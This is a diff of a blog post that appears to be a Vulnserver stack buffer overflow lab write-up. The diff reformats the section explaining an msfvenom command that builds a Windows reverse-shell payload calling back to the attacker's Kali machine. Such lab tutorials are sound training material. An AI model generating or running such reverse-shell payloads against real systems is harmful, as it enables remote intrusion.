Derpyho0ves/Derpyho0ves.github.io/_posts/2020-01-19-Vulnserver-Stack-Based-Buffer-Overflow.md

 ### Reverse shell

 Using msfvenom we can create a reverse shell.
-Using the command ** msfvenom -p windows/shell_reverse_tcp lhost=kali ip lport= kali port exitfunc=thread -f c -a x86 -b "\x00"** where
+Using the command **msfvenom -p windows/shell_reverse_tcp lhost=kali ip lport= kali port exitfunc=thread -f c -a x86 -b "\x00"** where
-* -p
-	means payload we want to use
+* -p - means payload we want to use
-* lhost
-	kali ip address
+* lhost	- kali ip address
-* lport
-	kali port to listen on
+* lport - kali port to listen on
-* exitfunc=thread
-	makes the exploit more reliable
+* exitfunc=thread - makes the exploit more reliable
-* -f c
-	filetype for the exploit, in this case it is c
+* -f c - filetype for the exploit, in this case it is c
-* -a x86
-	specifies the architecture
+* -a x86 - specifies the architecture
-* -b "x\00"
+* -b "x\00" - bad characters
-	bad characters

 ![exp19](/images/vulnserver/stack/exp19.PNG)